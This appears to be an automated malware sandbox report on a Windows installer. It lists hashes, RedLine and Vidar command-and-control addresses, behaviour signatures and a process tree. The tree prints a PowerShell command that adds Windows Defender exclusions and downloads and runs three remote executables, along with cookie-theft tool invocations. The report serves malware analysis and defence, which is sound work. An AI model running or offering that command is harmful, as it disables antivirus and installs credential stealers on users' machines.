Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (20).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 2 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 28 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 40 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 34 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1016
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1028
      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
        2⤵
          PID:4072
        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
          2⤵
            PID:8660
          • C:\Users\Admin\AppData\Roaming\weaetgv
            C:\Users\Admin\AppData\Roaming\weaetgv
            2⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:5804
          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
            2⤵
              PID:9512
            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
              2⤵
                PID:10080
              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                2⤵
                  PID:6284
                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                  2⤵
                    PID:3520
                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                    2⤵
                      PID:10160
                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                      2⤵
                        PID:10224
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:5072
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:2312
                          • C:\Users\Admin\AppData\Roaming\weaetgv
                            C:\Users\Admin\AppData\Roaming\weaetgv
                            2⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:2288
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                              PID:4004
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:2676
                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                2⤵
                                  PID:5712
                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  2⤵
                                    PID:5080
                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    2⤵
                                      PID:7676
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                    1⤵
                                      PID:1144
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                      1⤵
                                        PID:1196
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                        1⤵
                                          PID:1380
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                          1⤵
                                            PID:1460
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                            1⤵
                                              PID:1936
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                              1⤵
                                                PID:2472
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                1⤵
                                                  PID:2528
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                  1⤵
                                                    PID:2780
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                    1⤵
                                                      PID:2800
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                      1⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:2868
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                        2⤵
                                                        • Drops file in System32 directory
                                                        • Checks processor information in registry
                                                        • Modifies data under HKEY_USERS
                                                        • Modifies registry class
                                                        PID:6684
                                                    • C:\Users\Admin\AppData\Local\Temp\Setup (20).exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Setup (20).exe"
                                                      1⤵
                                                      • Checks computer location settings
                                                      • Modifies system certificate store
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3220
                                                      • C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe
                                                        "C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:1924
                                                        • C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe
                                                          "C:\Users\Admin\Documents\GR1VugA08ZJAfTkWZUckPtj5.exe"
                                                          3⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:2452
                                                      • C:\Users\Admin\Documents\AhN_TNqLuOPVdxPNvuxmKjHO.exe
                                                        "C:\Users\Admin\Documents\AhN_TNqLuOPVdxPNvuxmKjHO.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:3796
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 760
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5092
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 812
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4924
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 840
                                                          3⤵
                                                          • Program crash
                                                          PID:4672
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 800
                                                          3⤵
                                                          • Program crash
                                                          PID:5208
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 956
                                                          3⤵
                                                          • Program crash
                                                          PID:5452
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 984
                                                          3⤵
                                                          • Program crash
                                                          PID:5704
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1012
                                                          3⤵
                                                          • Program crash
                                                          PID:5500
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1380
                                                          3⤵
                                                          • Program crash
                                                          PID:5472
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1408
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5452
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1464
                                                          3⤵
                                                          • Program crash
                                                          PID:2704
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1616
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          PID:6388
                                                      • C:\Users\Admin\Documents\x4fXd2QaV0v_TeU7DthMnPvH.exe
                                                        "C:\Users\Admin\Documents\x4fXd2QaV0v_TeU7DthMnPvH.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2876
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 668
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5048
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 676
                                                          3⤵
                                                          • Program crash
                                                          PID:3500
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 700
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3952
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 684
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4448
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1108
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4972
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1168
                                                          3⤵
                                                          • Program crash
                                                          PID:3080
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1100
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5152
                                                      • C:\Users\Admin\Documents\JJQcdndAN8f3TkHFzZ_xk8vN.exe
                                                        "C:\Users\Admin\Documents\JJQcdndAN8f3TkHFzZ_xk8vN.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:3128
                                                      • C:\Users\Admin\Documents\hkFeB5gNl6EJoQW15QOy2c78.exe
                                                        "C:\Users\Admin\Documents\hkFeB5gNl6EJoQW15QOy2c78.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3568
                                                      • C:\Users\Admin\Documents\Sf2adyyPKzxjWq4ANZnq7b3v.exe
                                                        "C:\Users\Admin\Documents\Sf2adyyPKzxjWq4ANZnq7b3v.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3520
                                                      • C:\Users\Admin\Documents\pf8PCPV38YE4y9b9ET1UjiRT.exe
                                                        "C:\Users\Admin\Documents\pf8PCPV38YE4y9b9ET1UjiRT.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3104
                                                      • C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe
                                                        "C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:1304
                                                        • C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe
                                                          "C:\Users\Admin\Documents\cM2NJ_cqyB8HVp1XaEl2jilT.exe" -q
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2904
                                                      • C:\Users\Admin\Documents\tI9pbWTEBhzgFw9Z4CixGAk7.exe
                                                        "C:\Users\Admin\Documents\tI9pbWTEBhzgFw9Z4CixGAk7.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1064
                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          • Drops file in Program Files directory
                                                          PID:4152
                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:2320
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:4428
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:4128
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:4240
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              4⤵
                                                                PID:7104
                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:4192
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:1896
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:4332
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 4192 -s 1312
                                                                4⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:5644
                                                          • C:\Users\Admin\Documents\gJzdY7NyA7eltvk9UMBg785Z.exe
                                                            "C:\Users\Admin\Documents\gJzdY7NyA7eltvk9UMBg785Z.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1260
                                                          • C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                            "C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2904
                                                            • C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                              C:\Users\Admin\Documents\ZQ2ncVW4RF8nJOj0Ddhs07ey.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4496
                                                          • C:\Users\Admin\Documents\NPxJloRKeTIoURgFj2QxDIWQ.exe
                                                            "C:\Users\Admin\Documents\NPxJloRKeTIoURgFj2QxDIWQ.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2912
                                                          • C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                            "C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe"
                                                            2⤵
                                                              PID:1896
                                                              • C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                C:\Users\Admin\Documents\gcAy9AVeGQN4o9OIAmFvaJOs.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4744
                                                            • C:\Users\Admin\Documents\xjuPS_F3XQkeechcDPqUclSq.exe
                                                              "C:\Users\Admin\Documents\xjuPS_F3XQkeechcDPqUclSq.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2312
                                                            • C:\Users\Admin\Documents\LkWj_WyNx5YoYFbp4Wt2VolU.exe
                                                              "C:\Users\Admin\Documents\LkWj_WyNx5YoYFbp4Wt2VolU.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4112
                                                            • C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                              "C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4520
                                                              • C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                3⤵
                                                                  PID:4820
                                                                • C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                  C:\Users\Admin\Documents\0FRtchEG_mhMyuOgsBCdYwYf.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4276
                                                              • C:\Users\Admin\Documents\tbQlRGCUzeiRqg_l8sNH1kXn.exe
                                                                "C:\Users\Admin\Documents\tbQlRGCUzeiRqg_l8sNH1kXn.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4992
                                                              • C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                "C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe"
                                                                2⤵
                                                                  PID:4884
                                                                  • C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                    C:\Users\Admin\Documents\aWX5wxHif5UorScZZEzNiaIa.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1580
                                                                • C:\Users\Admin\Documents\rbrR9su3TdP347pwc5jtrSx5.exe
                                                                  "C:\Users\Admin\Documents\rbrR9su3TdP347pwc5jtrSx5.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4712
                                                                  • C:\Users\Admin\AppData\Roaming\3136792.exe
                                                                    "C:\Users\Admin\AppData\Roaming\3136792.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5064
                                                                  • C:\Users\Admin\AppData\Roaming\5536317.exe
                                                                    "C:\Users\Admin\AppData\Roaming\5536317.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:2220
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3500
                                                                  • C:\Users\Admin\AppData\Roaming\5676096.exe
                                                                    "C:\Users\Admin\AppData\Roaming\5676096.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4884
                                                                • C:\Users\Admin\Documents\14PB4Qz126a5Sk3ehZRyGir7.exe
                                                                  "C:\Users\Admin\Documents\14PB4Qz126a5Sk3ehZRyGir7.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4628
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                    3⤵
                                                                      PID:2280
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1896
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                        4⤵
                                                                          PID:7324
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                          4⤵
                                                                            PID:9332
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                            4⤵
                                                                              PID:9320
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                              4⤵
                                                                              • Blocklisted process makes network request
                                                                              PID:1752
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                              4⤵
                                                                                PID:1892
